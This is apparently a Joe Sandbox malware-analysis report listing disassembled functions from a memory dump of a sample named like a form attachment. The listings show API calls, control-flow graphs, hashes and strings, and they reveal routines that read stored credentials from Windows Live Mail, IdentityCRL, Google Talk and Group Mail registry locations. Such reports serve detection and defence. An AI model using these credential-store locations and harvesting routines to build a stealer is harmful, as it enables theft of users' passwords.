                                                                                                              control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                              • API String ID: 2768085393-1693574875
                                                                                                              • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                              • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                                                                              Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                              • memset.MSVCRT ref: 00444379
                                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                                              Strings
                                                                                                              • Store Root, xrefs: 004443A5
                                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                              • API String ID: 832325562-2578778931
                                                                                                              • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                              • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                                                              Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2012582556-3916222277
                                                                                                              • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                              • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                              Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                              • String ID: %s@yahoo.com
                                                                                                              • API String ID: 317221925-3288273942
                                                                                                              • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                              • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                              Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 347 404a99-404ac2 LoadLibraryA 348 404ac4-404ad2 GetProcAddress 347->348 349 404aec-404af4 347->349 350 404ad4-404ad8 348->350 351 404add-404ae6 FreeLibrary 348->351 355 404af5-404afa 349->355 354 404adb 350->354 351->349 352 404ae8-404aea 351->352 352->355 354->351 356 404b13-404b17 355->356 357 404afc-404b12 MessageBoxA 355->357
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll,771B0A60,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404AB8
                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,771B0A60), ref: 00404ADE
                                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                              • API String ID: 2780580303-317687271
                                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                              Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 358 4034e4-403544 memset * 2 call 410b1e 361 403580-403582 358->361 362 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 358->362 362->361
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403504
                                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                              • API String ID: 3071782539-966475738
                                                                                                              • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                              • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                              Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 367 40ccd7-40cd06 ??2@YAPAXI@Z 368 40cd08-40cd0d 367->368 369 40cd0f 367->369 370 40cd11-40cd24 ??2@YAPAXI@Z 368->370 369->370 371 40cd26-40cd2d call 404025 370->371 372 40cd2f 370->372 374 40cd31-40cd57 371->374 372->374 376 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 374->376 377 40cd59-40cd60 DeleteObject 374->377 377->376
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                              • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                              • memset.MSVCRT ref: 0040CD96
                                                                                                              • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2054149589-0
                                                                                                              • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                              • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                              Function 0044B40E Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 395 44b48d 386->395 396 44b428-44b433 GetProcAddress 386->396 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 397 44b471-44b474 394->397 399 44b48e-44b496 395->399 396->385 400 44b435-44b442 VirtualProtect 396->400 397->388 398 44b476-44b478 397->398 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->395 408->397
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099061454-0
                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                              • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                              • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                              Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                              • memset.MSVCRT ref: 00408671
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                              Strings
                                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                                              • API String ID: 1366857005-1079885057
                                                                                                              • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                              • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                              Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 445 40ba74 439->445 446 40ba6f-40ba72 439->446 440->433 440->434 441 40baa0-40bab3 call 407e30 449 40bab5-40bac1 441->449 450 40bafa-40bb09 SetCursor 441->450 448 40ba75-40ba76 call 40b5e5 445->448 446->448 448->440 452 40bac3-40bace 449->452 453 40bad8-40baf7 qsort 449->453 452->453 453->450 456->441 457->441 458->441 459->441 460->441
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                                              • String ID: /nosort$/sort
                                                                                                              • API String ID: 882979914-1578091866
                                                                                                              • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                              • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                              Function 0044B3CF Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
